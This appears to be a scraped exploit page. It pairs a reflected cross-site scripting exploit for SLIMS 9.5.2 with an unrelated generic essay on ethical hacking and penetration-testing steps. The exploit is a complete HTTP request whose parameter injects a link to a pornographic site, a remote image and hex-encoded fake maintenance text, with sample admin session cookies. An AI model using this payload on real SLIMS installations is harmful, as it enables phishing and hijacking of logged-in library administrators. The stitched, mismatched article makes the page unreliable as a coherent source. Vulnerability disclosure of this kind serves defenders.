    ## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit## Development: nu11secur1ty## Date: 01.19.2023## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload udz21<script>alert(1)</script>rk346 was submitted inmanual insertion point 3.This input was echoed unmodified in the application's response.The attacker can trick the already logged-in user, to visit theexploit link that this attacker is created,and if this already logged-in user is not actually IT or admin, thiswill be the end of this system.## STATUS: HIGH Vulnerability[+] Exploit:```GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27HTTP/1.1Host: pwnedhost1.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)## Proof and Exploit:[href](https://streamable.com/zd6e18)## Reference:[href](https://portswigger.net/web-security/cross-site-scripting)

SLIMS 9.5.2 Cross Site Scripting

There's a fine line between a hacker and an attacker, but it pays to be proactive. Consider tests by ethical hackers, a red team, or pen testers, and then bolster your company's defenses against malicious attacks.

In the world of security, there is no completely secure application or piece of software. At any point in time, a new vulnerability can be discovered, or a new exploit disclosed. The significance of recent exploits such as Log4Shell and PrintNightmare has led many organizations to re-evaluate how they efficiently and effectively discover and patch vulnerabilities before they can be exploited by an attacker.

As most organizations have expanded their technology stacks to keep pace with IT modernization and to help streamline remote work productivity, there are a host of systems and applications that cybercriminals can now exploit to gain access to sensitive company data. Keeping track of the risks and vulnerabilities within each technology is an ongoing challenge for business leaders and security teams, especially as company data is often highly dispersed across technologies and housed within different platforms.

One way to begin the process of better protecting company assets from an attack revolves around being more selective about which vulnerabilities to spend resources on.

**Assess Threat Levels**

The priority of a threat or vulnerability is subjective and will vary depending on the size of the company, the industry it operates within, and the type of data it retains. Companies need to determine if a malicious threat is affecting something that is core to their operating system and how it may impact their business. Sometimes a threat is hibernating, waiting for local privilege escalations, at which point the attacker will strike. Companies need visibility into their vulnerabilities before the malicious hacker has a chance to attack.

To do this and determine the severity of a threat, security teams cannot rely strictly on scanners anymore. If an organization is only running the same scans that the hackers run, they're doing the bare minimum to prevent automated attacks. This may work in the short term ... until the company is specifically targeted for an attack. In this case, the bad guys will be doing much more than the scanners — they will be finding new vulnerabilities, chaining vulnerabilities together, and finding new attack vectors.

Organizations must have knowledge of the same exploits that hackers have,_before_the hackers do, and patch them. One of the best ways to achieve this is utilizing ethical hackers — red teams, pen testers, bug bounties. They go beyond just using scanners. Ethical hackers find vulnerabilities that aren't being scanned for and create proof of concepts for attacks.

**Play-by-Play of an Ethical Hacker**

Here's a quick synopsis of how an ethical hacker could work to protect your organization by exposing vulnerabilities in advance:

**Step 1:** Obtain access

Hackers can often buy access to a company's internal system through the Dark Web for only a few hundred dollars. Alternatively, they can find access through leaked credentials, phishing, or other social engineering strategies.

**Step 2:** Active reconnaissance

Once into the company's internal system, they perform broad reconnaissance, including a network sweep. By doing so, they can enumerate networks, services, directories on hosts, vulnerabilities, and privileges. Using command-line controls, the hacker can look for open ports, such as Web ports, server message blocks (SMB) ports used for network shares, and remote desktop ports for managing workstations.

**Step 3:** Check for low-hanging vulnerabilities

Why pick the lock when the door is left open? Ideally, an attacker would first hope to find vulnerabilities for SMB ports, such as SMBGhost or WannaCry. If the organization has done a good job patching those SMB vulnerabilities and hardened your system, an attacker would then need to continue looking for opportunities.

**Step 4:** Target weak applications

In the attack scenario, the hacker would eventually find a vulnerable unpatched application.

**Step 5**: Elevate privileges

Unless you've disabled any default setting, the hacker would then escalate privileges from a basic user to a system user almost instantly, without the user ever knowing.

**Step 6:** Pass-the-hash

The hacker could then look for any hashes left by high-level users who logged into the endpoint in the past. Once found, a pass-the-hash attack can be executed to get access to systems as the highly privileged user, without knowing the actual user's password.

**Step 7:** Extract privileged credentials

By eventually extracting the proper credentials, the attacker could then gain access to the Domain Controller, giving them host access to Windows domain resources, as well as more workstations and other servers within the domain. With this, the hacker could manipulate systems, exfiltrate sensitive information, and essentially do anything they wanted on the domain.

This synopsis sheds light for a security team on just how easily an attack could be possible. Yet because the hacker was on the organization's side, no damage was really done, and valuable insights were collected on where/how to patch any open attack vectors and reduce the risks of malicious attackers discovering them first.

**Hacker vs. Attacker?**

In the mind of many ethical hackers, one of the biggest questions is where to draw the line. Is it OK to take advantage of an exploit if the intent is to shed light on the vulnerability? Where does a demonstration of a proof of concept cross that line into unethical territory? Would something as benign as sending a harmless email from a company account or even just typing into a Word document deserve scrutiny?

There's a fine line between a hacker and an attacker. Hacking itself is not a crime; rather, it is the motive and how a hacker applies their knowledge that differentiates doing criminal work and doing good work. Whether it's a security team, a red team, or a pen-testing group, or just an individual who found a vulnerability, one should much rather want to know about it before a malicious hacker does. It's much more difficult to clean up an attack than it is to prevent it.

With the right intentions, hacking can make the world a safer place. Just make sure to get permission — stay legal and do it with the right authorizations. Most hackers are good citizens looking to make the world a safer place.

Tag

#windows